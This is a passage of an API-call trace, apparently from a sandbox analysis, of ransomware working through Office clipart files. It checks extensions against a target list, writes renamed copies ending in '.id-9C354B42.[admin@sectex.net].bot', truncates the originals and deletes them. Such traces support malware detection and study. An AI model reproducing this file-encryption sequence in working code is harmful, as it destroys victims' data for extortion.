	[0171.216] lstrlenW (lpString=".rar") returned 4
	[0171.216] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString=".bz2") returned 4
	[0171.216] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString=".7z") returned 3
	[0171.216] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.216] lstrlenW (lpString=".dbf") returned 4
	[0171.216] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.216] lstrlenW (lpString=".1cd") returned 4
	[0171.216] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.216] lstrlenW (lpString=".jpg") returned 4
	[0171.216] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.216] lstrlenW (lpString=".doc") returned 4
	[0171.216] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString=".docx") returned 5
	[0171.216] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.216] lstrlenW (lpString=".pdf") returned 4
	[0171.216] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.216] lstrlenW (lpString=".xls") returned 4
	[0171.216] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.216] lstrlenW (lpString=".xlsx") returned 5
	[0171.216] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.217] lstrlenW (lpString=".ppt") returned 4
	[0171.217] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.217] lstrlenW (lpString=".zip") returned 4
	[0171.217] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.217] lstrlenW (lpString=".rar") returned 4
	[0171.217] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.217] lstrlenW (lpString=".bz2") returned 4
	[0171.217] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.217] lstrlenW (lpString=".7z") returned 3
	[0171.217] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.217] lstrlenW (lpString=".dbf") returned 4
	[0171.217] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.217] lstrlenW (lpString=".1cd") returned 4
	[0171.217] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 63
	[0171.217] lstrlenW (lpString=".jpg") returned 4
	[0171.217] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.217] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.217] lstrlenW (lpString="J0183198.WMF") returned 12
	[0171.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.218] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=24430) returned 1
	[0171.218] CloseHandle (hObject=0x354) returned 1
	[0171.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf")) returned 0x20
	[0171.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.218] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.218] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.219] GetLastError () returned 0x0
	[0171.219] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5f6e, lpOverlapped=0x0) returned 1
	[0171.221] WriteFile (in: hFile=0x124, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5f70, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5f70, lpOverlapped=0x0) returned 1
	[0171.222] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.222] WriteFile (in: hFile=0x124, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.223] SetEndOfFile (hFile=0x124) returned 1
	[0171.223] CloseHandle (hObject=0x124) returned 1
	[0171.223] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.223] SetEndOfFile (hFile=0x354) returned 1
	[0171.379] CloseHandle (hObject=0x354) returned 1
	[0171.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.391] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf")) returned 1
	[0171.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.392] lstrlenW (lpString=".doc") returned 4
	[0171.392] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.392] lstrlenW (lpString=".docx") returned 5
	[0171.392] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.392] lstrlenW (lpString=".pdf") returned 4
	[0171.392] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.392] lstrlenW (lpString=".xls") returned 4
	[0171.392] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.392] lstrlenW (lpString=".xlsx") returned 5
	[0171.392] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.392] lstrlenW (lpString=".ppt") returned 4
	[0171.392] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.392] lstrlenW (lpString=".zip") returned 4
	[0171.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.393] lstrlenW (lpString=".rar") returned 4
	[0171.393] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString=".bz2") returned 4
	[0171.393] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString=".7z") returned 3
	[0171.393] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.393] lstrlenW (lpString=".dbf") returned 4
	[0171.393] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.393] lstrlenW (lpString=".1cd") returned 4
	[0171.393] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.393] lstrlenW (lpString=".jpg") returned 4
	[0171.393] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.393] lstrlenW (lpString=".doc") returned 4
	[0171.393] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString=".docx") returned 5
	[0171.393] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.393] lstrlenW (lpString=".pdf") returned 4
	[0171.393] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString=".xls") returned 4
	[0171.393] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.393] lstrlenW (lpString=".xlsx") returned 5
	[0171.393] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.393] lstrlenW (lpString=".ppt") returned 4
	[0171.393] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.394] lstrlenW (lpString=".zip") returned 4
	[0171.394] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.394] lstrlenW (lpString=".rar") returned 4
	[0171.394] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.394] lstrlenW (lpString=".bz2") returned 4
	[0171.394] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.394] lstrlenW (lpString=".7z") returned 3
	[0171.394] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.394] lstrlenW (lpString=".dbf") returned 4
	[0171.394] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.394] lstrlenW (lpString=".1cd") returned 4
	[0171.394] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 63
	[0171.394] lstrlenW (lpString=".jpg") returned 4
	[0171.394] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.394] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.394] lstrlenW (lpString="J0185798.WMF") returned 12
	[0171.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.395] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=33824) returned 1
	[0171.395] CloseHandle (hObject=0x354) returned 1
	[0171.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf")) returned 0x20
	[0171.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.395] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.395] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.396] GetLastError () returned 0x0
	[0171.396] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x8420, lpOverlapped=0x0) returned 1
	[0171.399] WriteFile (in: hFile=0x188, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x8430, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x8430, lpOverlapped=0x0) returned 1
	[0171.400] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.400] WriteFile (in: hFile=0x188, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.400] SetEndOfFile (hFile=0x188) returned 1
	[0171.400] CloseHandle (hObject=0x188) returned 1
	[0171.400] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.400] SetEndOfFile (hFile=0x354) returned 1
	[0171.403] CloseHandle (hObject=0x354) returned 1
	[0171.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf")) returned 1
	[0171.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.404] lstrlenW (lpString=".doc") returned 4
	[0171.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.404] lstrlenW (lpString=".docx") returned 5
	[0171.404] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.404] lstrlenW (lpString=".pdf") returned 4
	[0171.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.404] lstrlenW (lpString=".xls") returned 4
	[0171.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.404] lstrlenW (lpString=".xlsx") returned 5
	[0171.404] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.404] lstrlenW (lpString=".ppt") returned 4
	[0171.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.404] lstrlenW (lpString=".zip") returned 4
	[0171.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.404] lstrlenW (lpString=".rar") returned 4
	[0171.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString=".bz2") returned 4
	[0171.405] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString=".7z") returned 3
	[0171.405] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.405] lstrlenW (lpString=".dbf") returned 4
	[0171.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.405] lstrlenW (lpString=".1cd") returned 4
	[0171.405] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.405] lstrlenW (lpString=".jpg") returned 4
	[0171.405] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.405] lstrlenW (lpString=".doc") returned 4
	[0171.405] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString=".docx") returned 5
	[0171.405] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.405] lstrlenW (lpString=".pdf") returned 4
	[0171.405] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString=".xls") returned 4
	[0171.405] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.405] lstrlenW (lpString=".xlsx") returned 5
	[0171.405] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.405] lstrlenW (lpString=".ppt") returned 4
	[0171.405] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.405] lstrlenW (lpString=".zip") returned 4
	[0171.405] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.405] lstrlenW (lpString=".rar") returned 4
	[0171.406] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.406] lstrlenW (lpString=".bz2") returned 4
	[0171.406] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.406] lstrlenW (lpString=".7z") returned 3
	[0171.406] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.406] lstrlenW (lpString=".dbf") returned 4
	[0171.406] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.406] lstrlenW (lpString=".1cd") returned 4
	[0171.406] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 63
	[0171.406] lstrlenW (lpString=".jpg") returned 4
	[0171.406] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.406] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.406] lstrlenW (lpString="J0185800.WMF") returned 12
	[0171.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.407] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=24238) returned 1
	[0171.407] CloseHandle (hObject=0x354) returned 1
	[0171.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf")) returned 0x20
	[0171.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.408] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.408] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.419] GetLastError () returned 0x0
	[0171.419] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5eae, lpOverlapped=0x0) returned 1
	[0171.612] WriteFile (in: hFile=0x188, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5eb0, lpOverlapped=0x0) returned 1
	[0171.613] ReadFile (in: hFile=0x354, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.613] WriteFile (in: hFile=0x188, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.613] SetEndOfFile (hFile=0x188) returned 1
	[0171.613] CloseHandle (hObject=0x188) returned 1
	[0171.613] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.613] SetEndOfFile (hFile=0x354) returned 1
	[0171.616] CloseHandle (hObject=0x354) returned 1
	[0171.616] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.616] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf")) returned 1
	[0171.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.617] lstrlenW (lpString=".doc") returned 4
	[0171.617] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.617] lstrlenW (lpString=".docx") returned 5
	[0171.617] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.617] lstrlenW (lpString=".pdf") returned 4
	[0171.617] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.617] lstrlenW (lpString=".xls") returned 4
	[0171.617] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.617] lstrlenW (lpString=".xlsx") returned 5
	[0171.617] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.617] lstrlenW (lpString=".ppt") returned 4
	[0171.617] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.617] lstrlenW (lpString=".zip") returned 4
	[0171.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.617] lstrlenW (lpString=".rar") returned 4
	[0171.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.617] lstrlenW (lpString=".bz2") returned 4
	[0171.618] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.618] lstrlenW (lpString=".7z") returned 3
	[0171.618] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.618] lstrlenW (lpString=".dbf") returned 4
	[0171.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
